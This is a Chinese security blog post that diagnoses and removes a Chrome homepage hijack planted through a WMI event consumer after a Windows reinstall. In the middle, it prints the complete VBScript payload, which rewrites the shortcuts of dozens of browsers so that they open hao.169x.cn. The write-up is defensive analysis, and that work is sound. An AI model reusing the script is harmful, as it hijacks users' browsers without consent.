流氓至此,我竟无言以对之Chrome 浏览器主页被篡

  • A+
所属分类:安全闲碎



网安引领时代,弥天点亮未来





 

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

0x00背景介绍


Windows10更新需谨慎,更新后系统盘文件夹windowsold禁忌误删关键信息。不然就会系统蓝屏,具体如下:

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

百度了很多种方法解决蓝屏问题,什么进安全模式、PE模式、自动修复等最终都以失败告终,花费的时间精力等太难了!最终选择了最不愿意选择的办法,重装系统。在重装系统的过程中也是万般艰难,难的不是装系统,难的是不通过大白菜安装。



 

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

0x01问题现象


系统安装完成了,但是通过流氓PE安装的系统肯定存在很多可见可不见的问题。目前看到的是通过官网下载的Chrome 浏览器安装之后,打开主页被篡为hao.123、hao.169........

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

流氓至此,我竟无言以对之Chrome 浏览器主页被篡




 

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

0x02问题定位


百度很多的解决办法都是治标不治本。

打开浏览器快捷方式,在目标中看到明显的加载篡改网站,也可以重命名快捷方式名字,删除网址后可暂时解决。

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

通过火绒剑查看程序启动加载的文件

进程名过滤:chrome.exe

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

开启监控,打开chrome浏览器

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

通过进程可以发现主程序在启动时就被流氓篡改加载预设值好的文件。

通过主程序跳转到具体的文件。

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

这里可以将文件进行提取,自己可以逆向分析,这里比较麻烦,就不操作了。

流氓至此,我竟无言以对之Chrome 浏览器主页被篡


流氓至此,我竟无言以对之Chrome 浏览器主页被篡

最后通过查阅资料,分析一种比较好的解决办法。

安装WMITools.exe工具,安装完成打开如下:

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

点击钢笔✒的图标,弹出的对话框一路OK就行

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

在右侧栏右键点击

ActiveScriptEventConsumper

并开通view instant properties查看属性:

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

查看Script text内容,可以看到这是一段VBScript代码,攻击目标涵盖了包括Chrome、360、Firefox、搜狗等浏览器有限定主页格式,于是这段脚本还特地修饰了流氓网站的链接。唉,流氓至此,我竟无言以对.........

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

On Error ResumeNext:Const link = "http://hao.169x.cn/?v=108":Const link360 ="http://hao.169x.cn/?v=108&s=3":browsers ="114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths= "C:UsersPublicDesktop,C:ProgramDataMicrosoftWindowsStartMenuPrograms,C:UsersAdministratorDesktop,C:UsersAdministratorAppDataRoamingMicrosoftInternetExplorerQuick Launch,C:UsersAdministratorAppDataRoamingMicrosoftInternetExplorerQuick LaunchUser PinnedStartMenu,C:UsersAdministratorAppDataRoamingMicrosoftInternetExplorerQuick LaunchUserPinnedTaskBar,C:UsersAdministratorAppDataRoamingMicrosoftWindowsStartMenuPrograms":browsersArr = split(browsers,","):Set oDic =CreateObject("scripting.dictionary"):For Each browser InbrowsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr =split(lnkpaths,","):Set oFolders =CreateObject("scripting.dictionary"):For Each lnkpath InlnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):SetWshShell = CreateObject("Wscript.Shell"):For Each oFolder InoFolders:If fso.FolderExists(oFolder) Then:For Each file Infso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) ="lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path =oShellLink.TargetPath:name = fso.GetBaseName(path) & "." &fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) =LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments= link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes -1:End If:oShellLink.Save:End If:End If:Next:End If:Next:

流氓至此,我竟无言以对之Chrome 浏览器主页被篡


 

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

0x03问题解决


需要以管理员身份运行WMI Event Viewer工具,然后按照上述问题定位的方法,然后删除。

     

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

                     


然后在把桌面图标、任务栏启动项(C:ProgramDataMicrosoftWindowsStart MenuPrograms)等在目标中删除。

流氓至此,我竟无言以对之Chrome 浏览器主页被篡


最终,可以摆脱流氓的劫持。

流氓至此,我竟无言以对之Chrome 浏览器主页被篡


 

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

0x04参考链接


https://www.zhihu.com/question/21883209

所需软件下载链接:

链接:

https://pan.baidu.com/s/1f7phn0nRskL5RZXG0igfWw

提取码:eta9



流氓至此,我竟无言以对之Chrome 浏览器主页被篡 

知识分享完了

喜欢别忘了关注我们哦~



学海浩茫,

予以风动,
必降弥天之润!


   弥  天

安全实验室

流氓至此,我竟无言以对之Chrome 浏览器主页被篡

本文始发于微信公众号(弥天安全实验室):流氓至此,我竟无言以对之Chrome 浏览器主页被篡

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: